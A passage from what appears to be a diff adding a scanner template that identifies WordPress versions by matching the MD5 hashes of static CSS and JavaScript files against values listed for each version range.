"{{BaseURL}}/wp-admin/css/customize-nav-menus-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"642b2c1283a26c19b78b4e204064f83c\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"7a848ee830c0c5b67da1a0566c3b4ec7\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.3 + dsl: + - "(\"0aca5fc957d7d65b7dc908967df8d2c1\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"c859a7494e93d515ea023e845b862de0\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - 
"(\"f1a43d2195725369dac369cc3d214af6\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"498fd625f4abfedd30fa50bb86cab3d8\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"c35fd5f35a602a245565b44e15aa604b\" == md5(body))" + - type: dsl + name: 4.3.2 - 4.3.25 + dsl: + - "(\"c6cf978207c6d98f9f51d20a25f34dd2\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.1 + dsl: + - "(\"ed59d15bec63adfb0080179e64a13954\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"106881f3a4b6d0906d30ce186f0cb4db\" == md5(body))" + - type: dsl + name: 4.9.2 - 4.9.16 + dsl: + - "(\"8f104e8e20108646cb3e9c69d819f195\" == md5(body))" + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"66bdd3cfa4505a15480321e0ec125d3f\" == md5(body))" + - type: dsl + name: 5.2 - 5.4.4 + dsl: + - "(\"215fb1ca4140dd402b16a6316067064a\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"5229afb1f372bcb09a21d3ef380d8abe\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d3a0abfffab24c079f3e3013ec60136d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-nav-menus.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"44f3f858820bbd8a2e0df20ed1ef0070\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"ac1398f94377751de7ffead484df8333\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.3 + dsl: + - "(\"3b1a54b0ef1e4feebd577c268f3b7b56\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"2e38f00fdfff5ee896dd3f15f06cf5d3\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"b4dcd2e0e34fc54708352f0a0d9d0379\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"3a84b0aef5c73a63db74c7c7c52f0de3\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"b28a18395e56677a32339cbd7c9837dd\" == md5(body))" + - type: dsl + name: 4.3.2 - 4.3.25 + dsl: + - "(\"a0aa2c9698c701cd03da983c6d1eaa00\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.1 + dsl: + - 
"(\"b1f7b5e6dbe60deefaa7691e6a826633\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"2e26ad1954acf52ef1df70ad03186873\" == md5(body))" + - type: dsl + name: 4.9.2 - 5.0.11 + dsl: + - "(\"67aad3843e4f5f4bde34a2f5c9c46aaa\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"355d4a2780e2f9b3e980ef74b7d7a146\" == md5(body))" + - type: dsl + name: 5.2 - 5.4.4 + dsl: + - "(\"e4832a345e012b47c028c8d9dfa2f3ad\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"b9cf7f8a3b56f7668afb7e9416efe5bf\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"5520940066ef5b2112560bec8d606306\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/media-models.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"9dbd7395fac0f6f1065bd5231d14941f\" == md5(body))" + - type: dsl + name: 4.3 - 4.6.20 + dsl: + - "(\"98fa336128f3c0da0271f568a0cc05d3\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.24 + dsl: + - "(\"2e7864d513c82363a81c6eb0337bd5f2\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"f66d1ebe4decdac8163979876b0023e7\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"79e9265523a309157cf3e3346f6cdaf3\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"a6af52ebc087c3024146b96304ab5b1d\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"3848a2f1838aebf9a4ff9dba3613a712\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"0c065b544bad77fbc55a68561cf67055\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"6eb56989a9553ce89b1cd706bfa17084\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"92a5d9fdc580782fefac7329ae7c43ab\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"6d5565dfc9ef63ef9188457921c6e708\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"d0fbf5b6c322c1ebe3b972eea62ec894\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - 
"(\"529e91f5ac6fd14fa38d85082d4aeab4\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"42280316bc7695cce608c075247712bb\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"a5e3ef6d503193408be3c987f0bfbb9a\" == md5(body))" + - type: dsl + name: 4.2.25 - 4.2.29 + dsl: + - "(\"6462ad87157a0ff259d227e676805a15\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"5541276bc1d1608b07691b3f8c487c89\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"4c9720b69a4695c799544597419eb86a\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d4238c1112684c2150318d1d7dd0cf99\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"5f0d3d36e8489cf3ce815f2a427121d2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/admin-bar-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"046e7e16b385ceaff66eba4956e99a8d\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"50dcb762647a492e4769ea0947b50248\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"7b8a4eb193902f3eb5321be2a1f8f39e\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"3317c4a0df48baaa87a41cfa963ef7f5\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"4cefd4ea07b52250161119b99b07c5cd\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"fbccb3a9d9e326432416170f500febe6\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"d8750588b9608c960a4c84111826363b\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"22f2a03358684885e9cfd7001df074a9\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"a4e8295dfbbffb2a1b3c15d599aa496f\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"ae164288125e6d5b18a41cd716b1e290\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"88af7a163758d4d5a13cf5b71e50fcac\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - 
"(\"20b09b48f38414802780b0e76ce0bd23\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"f581a4e8a0512e99baa8762fa1e27c4e\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"e010613db1aaafaa8897e716f3594225\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"cbcaa7ff91fc06bd6b10449306ba54f9\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"4dcd6a050acafbc397b761057d82e6ef\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"ce3489857c05ef7d6bde38d61f8c9590\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"c2c292b337230f342125bc7488b38bcc\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"557ccfd95017d0ea81c6e9f2ec1a6e7e\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"aefa2187af77b0f9ab7bacab3df4c0d4\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"9f6f6313a99bacb2e815596b354113d4\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"a8374ae13c60948627afad8d05b577f3\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"0681cef20e79f3dbdabd8dc1075ab948\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"768ff7aad2844bd7ade74814c1648bd7\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d59ee58d4aed2e96006bf1a02e98bbec\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/format-library.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"ce6d7774d49a758b607da01c68b15a58\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"590d64772c4414fbb688f129a6c9e9af\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"859a85a0da66968152601fa5558b5b07\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"e80477b2ce0ff34ac2fc000495285bbf\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"fc5024975c3d2bc66aa6aeee06647e15\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - 
"(\"9f737824d948eed09dcab71a2ab98d0e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"ecb50250c3b72af79307c863eaaaca84\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"12ae55e99484787294b80e64348c2384\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"e6173e37d837ce77fb8347e1d4a97abc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/rich-text.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"3a06513baf497e53b0908c155f1c6013\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"2b08233d7239ada8cf8b27d302a11a5c\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"31082605f1c90333bf255157b8affcb9\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"85d06c1f54c5f65009ae0fa1fc3a2c1f\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"38e202bee269957a40daaa5fff2e98fc\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"aa5eebad40c9c789bdb3cba2e188b214\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"8476aba44d5fd7cee30353d212ebc763\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"518412e4d64f0204bb35526845a9fd19\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"33adb469a67b720074abc0260904d269\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/rich-text.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"c56b09dee53354f60d943229fd881595\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"56efbae730dff0e4ebe544f04c1bcc61\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"898c7a4af828d255f2107593c6798f61\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"2b512c31caf790a2c86921f9e5aba54a\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"f26fd86d54e406c441c32d25c2baaecd\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"69c199809f214dea6dea7019d9b4b9c1\" == md5(body))" + - 
type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"709e70847fcd5ee992d466b36bdd60d2\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d50cb814c9f835eaff3493862afff438\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8b9d1f6566b1551875fc38b7438db6f6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/format-library.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"824845d2d6081499fc7ccc4077c4eddb\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"dee80998f8a3f592d7bf32754e8e3017\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"306eb481911cf7709eb0b2df94cfc1fd\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"1d0c1f96a2bab8bf8444a4a2518c8e40\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"0356b70777d0a101a52316e7223b6802\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"a2a8f2e8d8364cfe0c1f70b88947adfb\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"94ff59822055a2299ea5747e6a090f6c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d13511a6298af519aa0b799be66f9a9d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"12b59bd77e0a1f316057732f428e6f41\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/twemoji.min.js" + matchers: + - type: dsl + name: 4.8.2 - 4.9.2 + dsl: + - "(\"116aad1318ef7f049d2f2429faf670b4\" == md5(body))" + - type: dsl + name: 4.8 - 4.8.1 + dsl: + - "(\"dd5f53451b94fbbe3145f7987159a24c\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"467ef54bff10851a04064eebc9837d52\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"975227e3cbc1876e05bbb107da05fc81\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"6e0cefd4871c11ce6bf3d55f83cae0d3\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.4.24 + dsl: + - "(\"8ad73e167829a12b8a553070dd6a05e8\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - 
"(\"446ab329d408aa69da0e448298a039f4\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"9cfd48e37348e36a3caa072318531b08\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"b47c1841005ed6866cd72c7fc2b74d46\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.7 + dsl: + - "(\"a149011cef16cee2fe0507a94b71d466\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"47008e6186dfd2a8ea800d7d17158824\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"d25e686696ccc15195ecc70858f8e9c5\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"bcfb47f222286294b85658e5c48271b8\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"bd911c47ffa6cebe9968e2c5c81af2c1\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"c7b682cf436f591d75807356c449c254\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"dc7d6410824e50cb301d3b5736ecae9e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"aab18f118a004009b60e0daef478df74\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/user-profile.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"21a263cec51227aa5501116b190d2e49\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"c5f95e8f9ced3d06d137ec7f5a12de5a\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"258b8ad98219b15241bf340eb0f2dbce\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"c5faef1bebb47add41bc6b9d8123e5cf\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"658938d60803a1b5937727713fe5c445\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"d7ef7731b4b5a97befab69565fdc2929\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"e97fed4b3c06493ab6d1a3d15408ab15\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"28090921c47b8aab172ab53dcc269d00\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - 
"(\"c2bcc33ea5397b37fc77de3149618d9f\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"2b68876c91544e9d82a545409171468f\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"1f700cd405416317d2d97379c21c7c3c\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"9e703dc5d5f400b0b22e2fcf6c3da6e8\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"9a55eb19b2ba406d0c446494f5082362\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"8d2bdb3746a32cf6584131f1cf8862e9\" == md5(body))" + - type: dsl + name: 3.1.4 - 3.3.3 + dsl: + - "(\"55b400c3c8a9e0dd988b23e0f04a54e3\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.3 + dsl: + - "(\"530bc21feaa9a66288243dd56266dbbe\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"dc2668c5f95d07ede878842297184ba3\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"6f264365c799d04bf353784315b3541e\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"7e8a197f4aec099d481cc4b4dfcc0a21\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"1ce6b01fe41dbab94964a8818de75d06\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"6a893ff35450bbcd3f7a16f390dde7e5\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"415a0ae2d0ac703d2570ed209e058118\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"7436086296cefbd1254594fac9cfb5a7\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"f3fb0ce780fdba51eac8410bff1f10ca\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"ec61c3334afd91d00ef2ae64cf535743\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/admin-menu-rtl.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"4df6af8d274c9c84f00995c4b06b8668\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"dc74b14f3d25a91e399b6f613fe11223\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - 
"(\"6c35e5396302ef3514598cbf3b2f9947\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"a560d2a2be816bcbf121c4b2adeaf615\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"e3708169a620043b2c2bad64b0092b7e\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"9f8a90c453ec305769a851ceba7e13b5\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"8fa847b3101bc6a314bad8945e882caf\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"23ea18a6eb1d90eac261e4a1b9353d95\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"32278bfa99cf6275086c9adb6404df34\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"617bad9e838b5d8ff1a6694a2c2cf79a\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"4ef66dffa334e595d9c36c77013039ec\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"d58d3bec2d7c08206d637707aaf23b71\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"0abc3e469a077baf5d6a3adf7a223295\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"650410205bebd7b94622f81e6da5bf2e\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"9d35d5641379dbc4ccdf4e78b00d7436\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"f1e978748cb955c6753663d5eb74e6e9\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"bb7cbbb0b68e21bbf842631abc0b2af7\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"11c448411266aa8be98a3ec1243342aa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/edit-post.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"30484efddfcec29a589a630010742218\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"7c48d5f4807fa10ccb77202a44491a9a\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"7423dbf596bd505ff600ab11c69d15c2\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - 
"(\"b0d65703decbc306b9d81b05a8625fce\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"049c4a73407e96192a0ac3cc896a4de5\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"e6dfa21e9e682ef48457d5082eef65af\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"eef17b9afdaa6b821a520587b3957583\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"91bc264d134052313dacb207c1d54647\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"0c84a5b42fec684279dea617a6ea0936\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/viewport.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"8335564ab57cab0c2143177a750d4c4e\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"513302ca4e7e577e9d12033577e7e6f3\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"d7932636c66dd528dc7fd98caa7a607e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"bd8ff8373b15e52155cdef385a5cb9b3\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"f644859508f334d4ff334de7f0ba9291\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"ac4c0b7c50ac3513ccbf3f444f225b94\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"313d6768fa95fa9606e08d85065f0ccc\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"6b8fd78e47bd18e4ea42a7b16c41773b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"a557d591281154e3e7d3858ceebdc041\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/edit-post.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"e8b57bb2a220a0add16fd29153bc2c62\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"b8a4b45d991460d09f63361df8cece80\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"3a8f886d748dd1bc6390f29b8b1cc909\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"6205cc50d16c3911195c4ba650eae2a5\" == md5(body))" + - 
type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"4d75a79aec7e44bd8e9ecb609af8ef0b\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"401d4d2ca31482d7008b546483ce4ed7\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"7ac36a48ae712d480e11fdc9a45b193c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9620f0a72d8c82019c7ec8a45dd14f92\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"22419332501f620be339216513af3f5f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/viewport.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"b8808c497f7a393dfefb7e247a5c1a40\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"d0f03f46b2a5b0eafc7db072cd7a9c1d\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"ea43d42792f43b764449b2618693c069\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"050d9ddb1870241ee572b50a8f718f16\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"c52145ba03290a6899622dc4eb31678b\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"450867328ab4ca0027028349b98f8f2d\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"4e6323f06991ccefbecef6253bdcb300\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"60164c2e1e043a1f0f0304a5edf0942f\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"f72ebda44f55cf1d4237186a74376616\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/editor/style-rtl.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"b8e01a2dfd278d083558d9ebad4f77c6\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"c79f42c5df39a520784f0356855a6b8b\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"ab6108c21a2a1d14df1dc9f0d49827d7\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"ac76ed468d7b90a9673e680791195b8e\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - 
"(\"b93a5427eac05dc8585499cbdd0c8a52\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"0da91195d40246d5b6db07d553261811\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"dd3890418f907e7baba2bda1785c40c6\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"3c1f461558424e961dc67ca2b475bc38\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"7172fa59fb104710f7394a2350a2c884\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/editor/style.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"9fc37d757ecb84cd959eee49871c3108\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"4156647efce226809d062e7463a445a5\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"c16f103ecb87682ba3b40546bd0568ed\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"e23036d48e0637be779f9f6ae13dbdb7\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"2446562857ed21bae441500b23199a89\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"f46af19986f894a47409cd04a90e827e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"1043ed2681ceedc0263257325bafedde\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"256ed4469caf485d0b740722a00d220b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"03658ccc962f96ad1f01cde772821212\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-controls.css" + 